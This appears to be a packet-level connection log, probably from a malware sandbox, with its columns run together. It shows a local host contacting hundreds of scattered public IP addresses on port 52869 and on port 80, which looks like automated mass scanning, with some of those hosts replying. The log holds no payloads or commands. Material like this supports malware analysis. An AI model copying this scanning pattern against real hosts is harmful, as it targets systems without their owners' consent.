                                                Jul 20, 2024 23:05:32.037966967 CEST2696652869192.168.2.14201.98.195.221
                                                Jul 20, 2024 23:05:32.037966967 CEST2696652869192.168.2.14117.161.21.35
                                                Jul 20, 2024 23:05:32.037966967 CEST2696652869192.168.2.14131.173.248.11
                                                Jul 20, 2024 23:05:32.038034916 CEST802747895.105.189.30192.168.2.14
                                                Jul 20, 2024 23:05:32.038043022 CEST802747895.95.0.150192.168.2.14
                                                Jul 20, 2024 23:05:32.038049936 CEST802747895.171.59.128192.168.2.14
                                                Jul 20, 2024 23:05:32.038134098 CEST802747895.221.104.28192.168.2.14
                                                Jul 20, 2024 23:05:32.038140059 CEST802747895.92.89.0192.168.2.14
                                                Jul 20, 2024 23:05:32.038144112 CEST802747895.104.82.181192.168.2.14
                                                Jul 20, 2024 23:05:32.038181067 CEST802747895.253.68.139192.168.2.14
                                                Jul 20, 2024 23:05:32.038186073 CEST802747895.118.229.127192.168.2.14
                                                Jul 20, 2024 23:05:32.038362026 CEST2747880192.168.2.1495.147.34.110
                                                Jul 20, 2024 23:05:32.038362026 CEST2747880192.168.2.1495.229.226.108
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.1453.250.100.174
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.1412.117.96.240
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.14158.199.47.135
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.1460.71.198.184
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.14138.196.94.202
                                                Jul 20, 2024 23:05:32.038362026 CEST2696652869192.168.2.1498.92.244.227
                                                Jul 20, 2024 23:05:32.038408041 CEST802747895.7.55.159192.168.2.14
                                                Jul 20, 2024 23:05:32.038414001 CEST802747895.222.143.107192.168.2.14
                                                Jul 20, 2024 23:05:32.038418055 CEST802747895.175.95.30192.168.2.14
                                                Jul 20, 2024 23:05:32.038491964 CEST802747895.52.240.67192.168.2.14
                                                Jul 20, 2024 23:05:32.038497925 CEST802747895.160.37.150192.168.2.14
                                                Jul 20, 2024 23:05:32.038506031 CEST802747895.152.242.220192.168.2.14
                                                Jul 20, 2024 23:05:32.038530111 CEST802747895.135.8.87192.168.2.14
                                                Jul 20, 2024 23:05:32.038535118 CEST375502466192.168.2.1415.235.203.214
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.1470.243.21.189
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.14206.175.193.81
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.1469.149.29.243
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.1491.252.143.99
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.1483.140.116.41
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.14158.147.144.114
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.14216.157.160.122
                                                Jul 20, 2024 23:05:32.038619995 CEST802747895.196.78.122192.168.2.14
                                                Jul 20, 2024 23:05:32.038615942 CEST2696652869192.168.2.14193.248.76.98
                                                Jul 20, 2024 23:05:32.038626909 CEST802747895.233.67.203192.168.2.14
                                                Jul 20, 2024 23:05:32.038713932 CEST802747895.226.123.37192.168.2.14
                                                Jul 20, 2024 23:05:32.038738012 CEST802747895.232.172.140192.168.2.14
                                                Jul 20, 2024 23:05:32.038743973 CEST802747895.124.33.247192.168.2.14
                                                Jul 20, 2024 23:05:32.038784981 CEST802747895.253.60.168192.168.2.14
                                                Jul 20, 2024 23:05:32.039060116 CEST802747895.144.61.219192.168.2.14
                                                Jul 20, 2024 23:05:32.039073944 CEST802747895.106.119.20192.168.2.14
                                                Jul 20, 2024 23:05:32.039079905 CEST802747895.12.86.121192.168.2.14
                                                Jul 20, 2024 23:05:32.039088964 CEST802747895.225.106.73192.168.2.14
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.1419.225.133.125
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.14132.95.202.215
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.1417.171.65.161
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.1442.79.46.177
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.1486.204.19.17
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.1462.21.135.252
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.14161.186.13.200
                                                Jul 20, 2024 23:05:32.039094925 CEST2696652869192.168.2.14130.113.41.148
                                                Jul 20, 2024 23:05:32.039103985 CEST802747895.226.174.85192.168.2.14
                                                Jul 20, 2024 23:05:32.039114952 CEST802747895.89.1.223192.168.2.14
                                                Jul 20, 2024 23:05:32.039119959 CEST802747895.205.8.174192.168.2.14
                                                Jul 20, 2024 23:05:32.039139986 CEST802747895.35.102.19192.168.2.14
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14174.220.73.245
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14128.53.220.52
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14185.66.73.32
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14165.35.29.207
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14118.128.140.96
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14140.47.63.219
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14185.83.226.152
                                                Jul 20, 2024 23:05:32.039230108 CEST2696652869192.168.2.14176.224.134.202
                                                Jul 20, 2024 23:05:32.039295912 CEST802747895.67.18.163192.168.2.14
                                                Jul 20, 2024 23:05:32.039302111 CEST802747895.225.31.235192.168.2.14
                                                Jul 20, 2024 23:05:32.039307117 CEST802747895.113.152.215192.168.2.14
                                                Jul 20, 2024 23:05:32.039318085 CEST802747895.4.118.136192.168.2.14
                                                Jul 20, 2024 23:05:32.039321899 CEST802747895.7.223.209192.168.2.14
                                                Jul 20, 2024 23:05:32.039325953 CEST802747895.110.156.86192.168.2.14
                                                Jul 20, 2024 23:05:32.039369106 CEST802747895.36.184.91192.168.2.14
                                                Jul 20, 2024 23:05:32.039374113 CEST802747895.230.80.161192.168.2.14
                                                Jul 20, 2024 23:05:32.039566994 CEST802747895.138.187.113192.168.2.14
                                                Jul 20, 2024 23:05:32.039572001 CEST802747895.88.166.31192.168.2.14
                                                Jul 20, 2024 23:05:32.039655924 CEST802747895.90.183.228192.168.2.14
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.1434.133.129.111
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.14175.153.54.159
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.14111.2.195.137
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.14197.19.158.166
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.14196.194.105.55
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.1482.244.247.159
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.1484.28.135.126
                                                Jul 20, 2024 23:05:32.039695024 CEST2696652869192.168.2.141.142.178.216
                                                Jul 20, 2024 23:05:32.039900064 CEST2696652869192.168.2.14184.87.79.26
                                                Jul 20, 2024 23:05:32.039900064 CEST2696652869192.168.2.14190.4.139.242
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.14143.94.64.200
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.14212.117.81.111
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.14129.11.122.111
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.14177.5.153.6
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.1488.220.229.137
                                                Jul 20, 2024 23:05:32.039901018 CEST2696652869192.168.2.1459.246.146.95
                                                Jul 20, 2024 23:05:32.039911032 CEST802747895.141.125.136192.168.2.14
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14170.238.6.76
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14102.92.87.20
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.1425.173.117.127
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14202.179.32.99
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14117.218.248.188
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.1446.88.221.209
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14157.122.114.72
                                                Jul 20, 2024 23:05:32.039932966 CEST2696652869192.168.2.14209.12.19.10
                                                Jul 20, 2024 23:05:32.039958000 CEST2696652869192.168.2.1472.205.115.146
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.51.67.17
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.213.62.59
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.149.219.245
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.141.241.34
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.30.215.131
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.103.199.233
                                                Jul 20, 2024 23:05:32.039958000 CEST2747880192.168.2.1495.236.153.96
                                                Jul 20, 2024 23:05:32.040011883 CEST802747895.97.246.58192.168.2.14
                                                Jul 20, 2024 23:05:32.040016890 CEST802747895.47.9.11192.168.2.14
                                                Jul 20, 2024 23:05:32.040020943 CEST802747895.59.195.243192.168.2.14
                                                Jul 20, 2024 23:05:32.040024996 CEST802747895.171.188.0192.168.2.14
                                                Jul 20, 2024 23:05:32.040030956 CEST802747895.196.26.178192.168.2.14
                                                Jul 20, 2024 23:05:32.040035963 CEST802747895.189.144.101192.168.2.14
                                                Jul 20, 2024 23:05:32.040203094 CEST802747895.142.95.47192.168.2.14
                                                Jul 20, 2024 23:05:32.040209055 CEST802747895.195.65.217192.168.2.14
                                                Jul 20, 2024 23:05:32.040441990 CEST802747895.162.173.254192.168.2.14
                                                Jul 20, 2024 23:05:32.040447950 CEST802747895.122.203.9192.168.2.14
                                                Jul 20, 2024 23:05:32.040460110 CEST802747895.172.50.64192.168.2.14
                                                Jul 20, 2024 23:05:32.040465117 CEST802747895.159.252.208192.168.2.14
                                                Jul 20, 2024 23:05:32.040543079 CEST802747895.162.207.34192.168.2.14
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14126.135.213.175
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.1494.124.142.51
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14218.18.181.208
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14197.135.108.6
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14152.218.90.56
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14175.134.55.203
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.14152.186.151.198
                                                Jul 20, 2024 23:05:32.040607929 CEST2696652869192.168.2.1413.138.26.20
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.1499.81.223.53
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.1472.79.162.38
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.14157.67.163.111
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.141.160.152.237
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.1466.117.167.70
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.14128.109.58.169
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.14168.150.44.111
                                                Jul 20, 2024 23:05:32.040623903 CEST2696652869192.168.2.14184.155.144.12
                                                Jul 20, 2024 23:05:32.040667057 CEST802747895.119.161.98192.168.2.14
                                                Jul 20, 2024 23:05:32.040797949 CEST802747895.217.117.186192.168.2.14
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.200.56.77
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.202.64.243
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.31.42.191
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.10.176.176
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.105.189.30
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.104.82.181
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.118.229.127
                                                Jul 20, 2024 23:05:32.040955067 CEST2747880192.168.2.1495.222.143.107
                                                Jul 20, 2024 23:05:32.040970087 CEST802747895.192.5.101192.168.2.14
                                                Jul 20, 2024 23:05:32.041004896 CEST2696652869192.168.2.1494.183.125.31
                                                Jul 20, 2024 23:05:32.041004896 CEST2696652869192.168.2.14207.173.20.157
                                                Jul 20, 2024 23:05:32.041006088 CEST2696652869192.168.2.1465.30.175.250
                                                Jul 20, 2024 23:05:32.041006088 CEST2696652869192.168.2.14184.72.244.166
                                                Jul 20, 2024 23:05:32.041006088 CEST2696652869192.168.2.1466.112.35.179
                                                Jul 20, 2024 23:05:32.041006088 CEST2696652869192.168.2.14222.43.96.53
                                                Jul 20, 2024 23:05:32.041076899 CEST802747895.120.130.213192.168.2.14
                                                Jul 20, 2024 23:05:32.041115046 CEST802747895.0.108.122192.168.2.14
                                                Jul 20, 2024 23:05:32.041121006 CEST802747895.150.140.105192.168.2.14
                                                Jul 20, 2024 23:05:32.041243076 CEST802747895.232.80.100192.168.2.14
                                                Jul 20, 2024 23:05:32.041260004 CEST802747895.184.55.19192.168.2.14
                                                Jul 20, 2024 23:05:32.041265965 CEST802747895.234.32.130192.168.2.14
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.1451.148.178.221
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.14205.167.203.127
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.1484.96.184.112
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.145.19.232.245
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.14164.46.151.82
                                                Jul 20, 2024 23:05:32.041434050 CEST2696652869192.168.2.14156.8.17.233
                                                Jul 20, 2024 23:05:32.041450024 CEST802747895.167.177.92192.168.2.14
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.1444.31.73.44
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.14150.22.56.153
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.1413.72.181.91
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.14180.20.215.41
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.14180.249.131.251
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.1443.186.78.228
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.14171.203.141.24
                                                Jul 20, 2024 23:05:32.041450024 CEST2696652869192.168.2.1440.101.121.194
                                                Jul 20, 2024 23:05:32.041526079 CEST802747895.176.104.254192.168.2.14
                                                Jul 20, 2024 23:05:32.041623116 CEST2696652869192.168.2.14154.24.35.247
                                                Jul 20, 2024 23:05:32.041623116 CEST2696652869192.168.2.14178.74.79.246
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.14124.232.179.12
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.14124.192.17.215
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.14211.192.23.252
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.14160.88.6.15
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.1499.129.21.21
                                                Jul 20, 2024 23:05:32.041624069 CEST2696652869192.168.2.14167.31.226.137
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.1447.136.236.117
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.14126.145.61.211
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.14137.110.96.64
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.1487.140.196.185
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.141.159.73.15
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.14203.245.149.142
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.14187.39.214.106
                                                Jul 20, 2024 23:05:32.041702986 CEST2696652869192.168.2.14212.197.36.240
                                                Jul 20, 2024 23:05:32.041712999 CEST2747880192.168.2.1495.152.242.220
                                                Jul 20, 2024 23:05:32.041712999 CEST2747880192.168.2.1495.52.240.67
                                                Jul 20, 2024 23:05:32.041712999 CEST2747880192.168.2.1495.233.67.203
                                                Jul 20, 2024 23:05:32.041712999 CEST2747880192.168.2.1495.226.174.85
                                                Jul 20, 2024 23:05:32.041712999 CEST2747880192.168.2.1495.230.80.161
                                                Jul 20, 2024 23:05:32.041781902 CEST802747895.79.219.101192.168.2.14
                                                Jul 20, 2024 23:05:32.041788101 CEST802747895.50.79.159192.168.2.14
                                                Jul 20, 2024 23:05:32.041976929 CEST802747895.6.133.254192.168.2.14
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.1492.37.5.52
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.14167.111.204.126
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.14169.120.213.25
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.14111.193.163.87
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.14216.43.210.251
                                                Jul 20, 2024 23:05:32.042020082 CEST2696652869192.168.2.14183.104.222.96
                                                Jul 20, 2024 23:05:32.042020082 CEST2747880192.168.2.1495.171.59.128
                                                Jul 20, 2024 23:05:32.042020082 CEST2747880192.168.2.1495.92.89.0
                                                Jul 20, 2024 23:05:32.042042971 CEST802747895.79.86.158192.168.2.14
                                                Jul 20, 2024 23:05:32.042149067 CEST802747895.187.48.85192.168.2.14
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.1450.40.58.134
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.1470.203.64.153
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.14140.146.33.123
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.1445.49.209.48
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.1483.220.41.83
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.14124.236.219.149
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.1496.118.58.181
                                                Jul 20, 2024 23:05:32.042157888 CEST2696652869192.168.2.14201.254.61.65
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1417.249.122.136
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1496.55.180.219
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1468.201.157.11
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.14176.208.112.109
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1453.104.158.74
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.14144.181.35.38
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1494.210.96.135
                                                Jul 20, 2024 23:05:32.042181969 CEST2696652869192.168.2.1480.190.116.2
                                                Jul 20, 2024 23:05:32.042215109 CEST802747895.75.70.176192.168.2.14
                                                Jul 20, 2024 23:05:32.042272091 CEST802747895.158.58.2192.168.2.14
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.1462.30.169.120
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.14213.96.142.188
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.1474.128.30.189
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.14130.203.78.137
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.14102.126.166.241
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.141.210.218.170
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.14162.110.195.221
                                                Jul 20, 2024 23:05:32.042428017 CEST2696652869192.168.2.14109.30.97.197
                                                Jul 20, 2024 23:05:32.042437077 CEST802747895.137.148.134192.168.2.14
                                                Jul 20, 2024 23:05:32.042645931 CEST2696652869192.168.2.14161.69.197.252
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.1414.64.188.90
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.14120.143.100.19
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.1466.230.111.143
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.1446.140.94.219
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.14125.47.68.181
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.14207.236.94.3
                                                Jul 20, 2024 23:05:32.042646885 CEST2696652869192.168.2.1472.78.106.232
                                                Jul 20, 2024 23:05:32.042711973 CEST802747895.242.95.195192.168.2.14
                                                Jul 20, 2024 23:05:32.042769909 CEST802747895.138.43.61192.168.2.14
                                                Jul 20, 2024 23:05:32.042774916 CEST802747895.233.82.10192.168.2.14
                                                Jul 20, 2024 23:05:32.042778969 CEST802747895.120.43.18192.168.2.14
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.142.138.110.14
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.1431.50.201.16
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.1489.84.82.50
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.14105.61.252.250
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.14205.243.92.199
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.1499.157.239.34
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.14118.145.115.33
                                                Jul 20, 2024 23:05:32.042830944 CEST2696652869192.168.2.1481.198.189.131
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.253.68.139
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.7.55.159
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.175.95.30
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.160.37.150
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.135.8.87
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.226.123.37
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.124.33.247
                                                Jul 20, 2024 23:05:32.042876959 CEST2747880192.168.2.1495.144.61.219
                                                Jul 20, 2024 23:05:32.042910099 CEST802747895.63.226.197192.168.2.14
                                                Jul 20, 2024 23:05:32.042915106 CEST802747895.199.134.153192.168.2.14
                                                Jul 20, 2024 23:05:32.042918921 CEST802747895.109.117.158192.168.2.14
                                                Jul 20, 2024 23:05:32.042948961 CEST802747895.231.75.162192.168.2.14
                                                Jul 20, 2024 23:05:32.042949915 CEST2696652869192.168.2.14120.63.39.150
                                                Jul 20, 2024 23:05:32.042949915 CEST2696652869192.168.2.14191.137.205.200
                                                Jul 20, 2024 23:05:32.042949915 CEST2696652869192.168.2.14161.128.80.182
                                                Jul 20, 2024 23:05:32.042949915 CEST2747880192.168.2.1495.196.78.122
                                                Jul 20, 2024 23:05:32.042949915 CEST2747880192.168.2.1495.12.86.121
                                                Jul 20, 2024 23:05:32.042949915 CEST2747880192.168.2.1495.4.118.136
                                                Jul 20, 2024 23:05:32.042949915 CEST2747880192.168.2.1495.110.156.86
                                                Jul 20, 2024 23:05:32.042951107 CEST2747880192.168.2.1495.138.187.113
                                                Jul 20, 2024 23:05:32.042968988 CEST2696652869192.168.2.14221.1.36.152
                                                Jul 20, 2024 23:05:32.042968988 CEST2696652869192.168.2.14149.11.81.145
                                                Jul 20, 2024 23:05:32.042968988 CEST2696652869192.168.2.1447.188.189.126
                                                Jul 20, 2024 23:05:32.042968988 CEST2696652869192.168.2.1424.165.122.205
                                                Jul 20, 2024 23:05:32.042968988 CEST2747880192.168.2.1495.140.77.139
                                                Jul 20, 2024 23:05:32.042968988 CEST2747880192.168.2.1495.90.175.46
                                                Jul 20, 2024 23:05:32.042968988 CEST2747880192.168.2.1495.90.211.182
                                                Jul 20, 2024 23:05:32.042968988 CEST2747880192.168.2.1495.219.244.209
                                                Jul 20, 2024 23:05:32.043020964 CEST802747895.239.4.186192.168.2.14
                                                Jul 20, 2024 23:05:32.043067932 CEST802747895.44.111.211192.168.2.14
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.153.161.43
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.155.142.152
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.106.213.101
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.95.0.150
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.221.104.28
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.232.172.140
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.253.60.168
                                                Jul 20, 2024 23:05:32.043230057 CEST2747880192.168.2.1495.89.1.223
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.14212.254.248.190
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.14168.233.49.39
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.1436.151.23.112
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.1479.180.149.218
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.1476.181.138.218
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.14188.235.214.61
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.14182.25.120.189
                                                Jul 20, 2024 23:05:32.043246031 CEST2696652869192.168.2.14151.89.187.172
                                                Jul 20, 2024 23:05:32.043267965 CEST802747895.147.34.110192.168.2.14
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.90.183.228
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.97.246.58
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.171.188.0
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.189.144.101
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.122.203.9
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.119.161.98
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.217.117.186
                                                Jul 20, 2024 23:05:32.043276072 CEST2747880192.168.2.1495.120.130.213
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.35.102.19
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.113.152.215
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.88.166.31
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.141.125.136
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.59.195.243
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.196.26.178
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.142.95.47
                                                Jul 20, 2024 23:05:32.043391943 CEST2747880192.168.2.1495.195.65.217
                                                Jul 20, 2024 23:05:32.043464899 CEST2696652869192.168.2.14193.133.163.215
                                                Jul 20, 2024 23:05:32.043464899 CEST2696652869192.168.2.1441.130.175.151
                                                Jul 20, 2024 23:05:32.043464899 CEST2696652869192.168.2.14105.94.86.192
                                                Jul 20, 2024 23:05:32.043464899 CEST2696652869192.168.2.14116.60.161.57
                                                Jul 20, 2024 23:05:32.043464899 CEST2696652869192.168.2.14117.170.152.121
                                                Jul 20, 2024 23:05:32.043464899 CEST2747880192.168.2.1495.106.119.20
                                                Jul 20, 2024 23:05:32.043464899 CEST2747880192.168.2.1495.225.106.73
                                                Jul 20, 2024 23:05:32.043464899 CEST2747880192.168.2.1495.205.8.174
                                                Jul 20, 2024 23:05:32.043494940 CEST2747880192.168.2.1495.67.18.163
                                                Jul 20, 2024 23:05:32.043574095 CEST2747880192.168.2.1495.172.50.64
                                                Jul 20, 2024 23:05:32.043574095 CEST2747880192.168.2.1495.159.252.208
                                                Jul 20, 2024 23:05:32.043574095 CEST2747880192.168.2.1495.162.207.34
                                                Jul 20, 2024 23:05:32.043586969 CEST2747880192.168.2.1495.150.140.105
                                                Jul 20, 2024 23:05:32.043586969 CEST2747880192.168.2.1495.184.55.19
                                                Jul 20, 2024 23:05:32.043586969 CEST2747880192.168.2.1495.176.104.254
                                                Jul 20, 2024 23:05:32.043586969 CEST2747880192.168.2.1495.6.133.254
                                                Jul 20, 2024 23:05:32.043586969 CEST2747880192.168.2.1495.79.86.158
